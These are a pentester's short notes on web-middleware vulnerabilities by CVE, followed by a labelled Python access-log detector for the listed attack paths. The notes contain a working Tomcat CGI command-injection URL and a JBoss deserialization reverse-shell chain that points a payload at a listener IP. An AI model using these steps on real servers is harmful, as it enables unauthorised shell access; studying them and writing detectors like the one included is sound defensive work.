Brief notes I took earlier from a document someone posted on Tusi (吐司)
-----
IIS
CVE-2017-7269
Apache
CVE-2017-15715
Nginx
location /files {
}
Tomcat
CVE-2019-0232
, 7.0.0 ~ 7.0.93
Upload an arbitrary lxhsec.bat
http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user
Tomcat + weak password && getshell vulnerability via the admin backend
Tomcat Manager App brute force
JBoss default ports: 8080, 9990
CVE-2017-12149
Exploit tool: JavaDeserH2HC. We pick a gadget, ReverseShellCommonsCollectionsHashMap, then compile it and generate the serialized data:
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.31.232:6666 (the IP is that of the host running nc)
curl http://192.168.31.205:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
CVE-2017-7504
WebLogic default port: 7001
CVE-2017-10271 & CVE-2017-3506
CVE-2019-2725
/_async/
/uddiexplorer/SearchPublicRegistries.jsp
GlassFish default ports: 8080 (web application port, i.e. the site content), 4848 (GlassFish admin center)
GlassFish Directory Traversal (CVE-2017-1000028)
GlassFish admin backend
WebSphere
Java deserialization (CVE-2015-7450)
system/ manager
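Added example, not part of the original notes: a defender-side access-log check for the request paths listed above (/invoker/readonly, /cgi-bin/*.bat with arguments, /_async/, /uddiexplorer/SearchPublicRegistries.jsp). The rule names, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Rule names are labels chosen for this example; the paths come from the notes above.
RULES = [
    ("jboss-invoker-readonly", re.compile(r"^/invoker/readonly(?:[/?]|$)", re.I)),
    # .bat is from the notes; .cmd is added here as the other Windows batch extension.
    ("tomcat-cgi-batch-args", re.compile(r"^/cgi-bin/[^?]*\.(?:bat|cmd)\?.", re.I)),
    ("weblogic-async", re.compile(r"^/_async/", re.I)),
    ("weblogic-uddiexplorer", re.compile(r"^/uddiexplorer/SearchPublicRegistries\.jsp", re.I)),
]

# Common/combined log format: client ident user [time] "METHOD target PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})')

def scan(lines):
    """Return (line_no, client, method, status, rule) for every request matching a rule."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        client, method, target, status = m.groups()
        # Percent-decode and collapse repeated slashes so trivial encodings still match.
        path = re.sub(r"/{2,}", "/", unquote(target))
        for rule, pattern in RULES:
            if pattern.search(path):
                hits.append((line_no, client, method, int(status), rule))
    return hits

def rules_by_client(hits):
    """Group rule names per client so one source probing several products stands out."""
    grouped = {}
    for _, client, _, _, rule in hits:
        grouped.setdefault(client, set()).add(rule)
    return grouped

# Constructed sample log lines (documentation IP range), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /index.jsp HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jan/2020:10:00:05 +0000] "POST /invoker/readonly HTTP/1.1" 500 1024',
    '192.0.2.66 - - [01/Jan/2020:10:00:09 +0000] "GET /cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user HTTP/1.1" 200 300',
    '192.0.2.77 - - [01/Jan/2020:10:01:00 +0000] "POST /_async/placeholder HTTP/1.1" 202 0',
    '192.0.2.77 - - [01/Jan/2020:10:01:30 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1" 200 900',
    '192.0.2.88 - - [01/Jan/2020:10:02:00 +0000] "POST /%69nvoker//readonly HTTP/1.1" 500 1024',
    '192.0.2.10 - - [01/Jan/2020:10:03:00 +0000] "GET /cgi-bin/status.bat HTTP/1.1" 200 64',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit only means the path was requested; whether the server is affected depends on its version and configuration.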
Source: Cnblogs (博客园)
Author: 君莫笑hhhhhh
Link: https://www.cnblogs.com/junmoxiao/p/11774772.html